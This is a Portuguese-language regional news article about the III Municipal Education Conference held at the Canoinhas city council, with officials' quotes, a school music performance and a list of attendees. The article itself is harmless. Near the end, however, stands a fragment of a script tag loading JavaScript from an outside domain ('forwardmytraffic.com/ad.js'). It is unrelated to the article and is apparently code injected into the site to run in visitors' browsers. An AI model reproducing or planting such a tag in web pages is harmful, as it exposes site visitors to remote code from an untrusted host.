InícioCidadeIII Conferência Municipal do CONAE é realizada em Canoinhas

III Conferência Municipal do CONAE é realizada em Canoinhas

Últimas notícias

Guerra Mundial: entenda riscos de conflito entre Israel e Irã

O risco de uma nova guerra mundial existe caso...

Parada 120 – Hamburgueria artesanal em Três Barras

Conheça o melhor delivery de hambúrgueres artesanais de Três...

Senado aprova isenção de IR para quem ganha até dois salários mínimos

O Senado aprovou nesta quarta-feira (17) o projeto de...

A câmara de vereadores de Canoinhas recebeu nesta sexta-feira, 27, a III Conferência Municipal de Educação, realizada pela prefeitura municipal. O tema deste ano é “A consolidação do Sistema Nacional de Educação (SNE) e o Plano Nacional de Educação (PNE): monitoramento, avaliação e proposição de políticas para a garantia do direito à educação de qualidade social, pública, gratuita e laica”.

 

 

Presidente da câmara, Coronel Mario Erzinger (PR) falou aos participantes da Conferência: “todos nós temos um grande desafio, que é melhorar os indicadores da educação do país. Esse é um desafio aos professores, escola e família, e debates como esse são muito importantes para definir metas e estratégias para essas melhorias”.

 

 

Secretário de Educação, Osmar Oleskovicz, também enfatizou que a realização da etapa municipal e o debate, são os primeiros passos para as mudanças necessárias a serem propostas para educação. “Tivemos momentos muito importantes de debates nas escolas, e nesse momento elas poderão ser discutidas, avaliadas e levadas para as próximas etapas”.

 

A Escola Básica Municipal Dr. Aroldo Carneiro de Carvalho realizou na abertura do evento três apresentações musicais, coordenadas pelos professores Margareth e Eduardo, que encantou e animou os participantes do evento.

 

 

Em seguida o palestrante Dr. Claudio Luiz Orço debateu importantes assuntos durante toda manhã sobre a CONAE. A realização da Conferência Municipal de Educação serviu para nortear propostas a serem encaminhadas para Conferência Regional de Educação.

 

 

A etapa estadual será realizada em Florianópolis nos dias 23 e 24 de julho, e a etapa nacional em Brasília doas dias 21 a 23 de novembro.

 

 

Participaram da abertura o presidente da câmara de vereadores, Coronel Mario Erzinger (PR); secretário municipal de Educação, Osmar Oleskovicz; supervisora de gestão de pessoas da Unidade de Atendimento Educacional, Marilin Cristine Silveira Schick; coordenador adjunto do Fórum do Plano Municipal de Educação e presidente do Conselho Municipal de Educação da Conferência Municipal de Educação, professor doutor Argos Gumbowski; diretora da Escola Gertrudes Muller, Tatiane Albuquerque, no ato representando todos os diretores; representante dos professores e presidente do Sindicato dos Servidores Municipais, Lúcia Brozoski; e vereadora mirim e representante dos alunos da rede, Vitória Martins.

… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.